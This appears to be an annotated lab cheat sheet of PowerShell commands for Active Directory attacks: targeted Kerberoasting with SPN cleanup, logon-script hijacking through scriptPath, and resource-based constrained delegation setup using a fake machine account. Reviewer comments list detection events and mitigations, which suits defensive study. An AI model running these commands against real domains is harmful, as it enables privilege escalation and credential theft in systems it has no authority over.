# Tooling used by the notes below. Each clone takes whatever the default branch
# holds at that moment; nothing is pinned or verified.
# NOTE(review): for a repeatable lab, check out a commit you have reviewed
# (<REVIEWED_COMMIT> placeholder) and keep these tools on an isolated
# assessment host, since endpoint protection commonly flags them.
# NOTE(review): the impacket project has since moved to the fortra organisation
# on GitHub and PowerSploit is no longer maintained upstream. Confirm which
# origin and revision you actually end up with.
git clone https://github.com/SecureAuthCorp/impacket.git
git clone https://github.com/PowerShellMafia/PowerSploit.git
git clone https://github.com/Kevin-Robertson/Powermad.git
git clone https://github.com/GhostPack/Rubeus.git
# Build a PSCredential for TESTLAB\dfm.a from a literal password.
# NOTE(review): a plaintext password in a script is recorded in console
# history, transcripts and PowerShell script block logging (event 4104).
# Treat the value below as a lab placeholder, never a real credential.
$SecPassword = ConvertTo-SecureString -String 'Password123!' -AsPlainText -Force
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList 'TESTLAB\dfm.a', $SecPassword
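## Kerberoasting
# Targeted variant: an SPN is written to a user object, a service ticket is
# requested for it, and the SPN is cleared again. It depends on $Cred holding
# write access to servicePrincipalName on Target_User, so the root cause is an
# over-permissive ACL on the user object.
# Detection: with "Audit Directory Service Changes" and a SACL on user objects,
# both the set and the clear produce event 5136 for servicePrincipalName.
# The ticket request produces event 4769 on the DC. An SPN appearing on an
# ordinary user account shortly before a 4769 for that account is a strong signal.
# Mitigation: review who can write to user objects, use long random passwords
# or gMSAs for real service accounts, and disable RC4 for Kerberos where possible.
Set-DomainObject -Credential $Cred -Identity Target_User -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
# Read the attribute back; the property name must match the one set above.
Get-DomainUser Target_User | Select-Object serviceprincipalname
Get-DomainSPNTicket -Credential $Cred Target_User | Format-List
# Opsec remove
# Clearing the SPN does not remove the 5136 / 4769 records already written.
Set-DomainObject -Credential $Cred -Identity Target_User -Clear serviceprincipalname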
## Login scripts
# Writes the scriptPath attribute of Target_User, so the named script is run
# when that user logs on. Like the SPN change, this needs write access to the
# user object.
# Detection: event 5136 for scriptPath when directory service change auditing
# is enabled. Legitimate logon scripts normally live under the NETLOGON share,
# so a scriptPath pointing at a local directory is a useful anomaly to alert on.
Set-DomainObject -Identity Target_User -Set @{
    scriptpath = 'C:\Windows\Tasks\login.ps1'
}
# Resource-based constrained delegation (RBCD) setup: a new computer account is
# created and then listed as allowed to delegate to the target computer.
# Mitigation: set ms-DS-MachineAccountQuota to 0 so ordinary users cannot add
# computer objects, restrict who can write to computer objects, and mark
# privileged accounts "sensitive and cannot be delegated" / Protected Users.
# Detection: event 4741 (computer account created) by a non-admin principal,
# and event 5136 for msDS-AllowedToActOnBehalfOfOtherIdentity on a computer
# object, which is the attribute -PrincipalsAllowedToDelegateToAccount writes.

# Load Powermad.
# NOTE(review): assumes the current directory is the Powermad clone. On a
# case-sensitive filesystem the file name must match the repository's; confirm.
Import-Module ./PowerMad.ps1

# Names of the new computer account and of the computer being targeted.
$FakePC = 'FAKE01'
$targetComputer = 'DC'

# Powermad: create the computer object in AD.
# NOTE(review): '123456' is a lab placeholder. A weak password on a machine
# account is itself a finding if the object is left behind.
$machinePassword = ConvertTo-SecureString '123456' -AsPlainText -Force
New-MachineAccount -MachineAccount $FakePC -Password $machinePassword -Verbose

# Built-in AD module: allow the new computer account (sAMAccountName ends in
# '$') to delegate to the target. This is resource-based constrained delegation.
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount ($FakePC + '$')

# Built-in AD module: read the property back to confirm the previous command.
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount